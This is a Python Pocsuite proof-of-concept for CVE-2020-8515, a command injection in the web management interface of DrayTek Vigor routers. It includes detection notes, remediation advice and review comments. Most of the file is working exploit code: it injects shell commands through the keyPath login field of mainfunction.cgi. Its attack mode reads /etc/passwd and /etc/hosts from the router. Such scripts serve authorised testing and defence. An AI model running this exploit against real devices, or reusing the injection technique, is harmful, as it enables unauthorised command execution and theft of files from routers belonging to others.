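import urlparse

from pocsuite.api.poc import POCBase
from pocsuite.api.poc import register
from pocsuite.api.poc import Output
from pocsuite.api.request import req
from pocsuite.api.utils import randomStr


class TestPOC(POCBase):
    """Pocsuite check for CVE-2020-8515 in the DrayTek Vigor web management UI.

    The check sends a login-shaped POST to /cgi-bin/mainfunction.cgi in which
    the ``keyPath`` field carries an encoded quote and newline (%27%0A)
    followed by a command. It reports the target as affected when a random
    marker passed to ``echo`` comes back as the first line of the response.

    Detection: in captured traffic the check appears as a POST to
    /cgi-bin/mainfunction.cgi with ``action=login``, a ``keyPath`` value
    containing %27%0A, the placeholder credentials ``a``/``a`` and a
    non-standard ``UserAgent`` request header.

    Remediation: apply the firmware update described in the DrayTek advisory
    listed in ``references``. Until then, keep the web management interface
    unreachable from untrusted networks.
    """

    vulID = 'CVE-2020-8515'
    version = ''
    author = 'elloit'
    vulDate = '2020-03-30'
    createDate = '2020-03-30'
    updateDate = '2020-03-30'
    references = [
        "https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/",
        "https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices/",
    ]
    # Runtime metadata string; in English: "CVE-2020-8515 DrayTek enterprise
    # router command execution vulnerability".
    name = 'CVE-2020-8515 draytek 企业级路由器命令执行漏洞'
    # Fixed: the original value carried a stray leading double quote.
    appPowerLink = 'https://www.draytek.com/'
    appName = 'DrayTek Vigor'
    # Left blank by the author; affected models and firmware are listed in
    # the vendor advisory under ``references``.
    appVersion = ''' '''
    # Runtime metadata string; in English: "command execution".
    vulType = '命令执行'
    desc = ''' '''
    samples = []
    install_requires = ""

    def _attack(self):
        """Run the marker check and, if it succeeds, also collect two files.

        Returns:
            Output: success with ``VerifyInfo`` holding ``url``, ``passwd``
            and ``hosts`` when the marker is echoed back, otherwise a failure.
        """
        return self.parse_output(self._check(collect_files=True))

    def _verify(self):
        """Confirm the issue with the random-marker echo only.

        Verify mode used to share the attack path and pulled /etc/passwd and
        /etc/hosts from every device that answered. Confirmation needs only
        the echoed marker, so file collection now happens in ``_attack`` only.

        Returns:
            Output: success with ``VerifyInfo['url']`` when the marker is
            echoed back, otherwise a failure.
        """
        return self.parse_output(self._check(collect_files=False))

    def _check(self, collect_files):
        """Normalise the target URL, run the marker check and build the result.

        Args:
            collect_files: when true and the marker check succeeds, the
                contents of /etc/passwd and /etc/hosts are added to the result.

        Returns:
            dict: empty when the marker was not echoed or any request step
            raised; otherwise ``{"VerifyInfo": {...}}``.
        """
        result = {}
        self.raw_url = self.url

        # Parse once instead of three times; self.url is rewritten below.
        parsed = urlparse.urlparse(self.url)
        host = parsed.hostname
        scheme = parsed.scheme
        port = "80" if parsed.port is None else str(parsed.port)

        # NOTE(review): for https targets an explicit port is discarded, so a
        # management UI on a non-default TLS port is never actually contacted.
        # A negative result for such a target is not evidence of a patched
        # device.
        if scheme == "https":
            self.url = "%s://%s" % (scheme, host)
        else:
            self.url = "%s://%s:%s" % (scheme, host, port)

        try:
            flag = randomStr(10)
            # Only the first response line is compared with the marker.
            check = self.run_cmd("echo${IFS}" + flag).split("\n")[0]
            if flag == check:
                result["VerifyInfo"] = {"url": self.url}
                if collect_files:
                    result["VerifyInfo"]["passwd"] = self.run_cmd("cat${IFS}%2fetc%2fpasswd")
                    result["VerifyInfo"]["hosts"] = self.run_cmd("cat${IFS}%2fetc%2fhosts")
        except Exception:
            # Deliberate best effort: any failure is reported as "not
            # vulnerable". A network error is therefore indistinguishable
            # from a patched device in the output.
            pass
        return result

    def run_cmd(self, cmd):
        """POST one request carrying ``cmd`` and return the response body.

        ``cmd`` is concatenated into the form body verbatim; this method
        applies no encoding of its own.

        Args:
            cmd: string placed inside the ``keyPath`` form field.

        Returns:
            str: the response text on HTTP 200, or ``""`` on any other status
            or on any exception.
        """
        try:
            # NOTE(review): the key is "UserAgent", not the standard
            # "User-Agent", so it goes out as an extra non-standard header.
            # Presumably the HTTP client's default User-Agent is sent as well
            # (confirm against ``req``). Left unchanged.
            headers = {
                "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
            }
            url = self.url + "/cgi-bin/mainfunction.cgi"
            data = "action=login&keyPath=%27%0A%2fbin%2f" + cmd + "%0A%27&loginUser=a&loginPwd=a"
            # The timeout tuple is presumably (connect, read) seconds, as in
            # the requests API; confirm against ``req``.
            res = req.post(url=url, data=data, timeout=(10, 15), headers=headers)
            if res.status_code == 200:
                return res.text
            return ""
        except Exception:
            return ""

    def parse_output(self, result):
        """Wrap ``result`` in a pocsuite ``Output``.

        Args:
            result: dict from the check; an empty dict means nothing was
                confirmed.

        Returns:
            Output: marked successful when ``result`` is non-empty, failed
            otherwise.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)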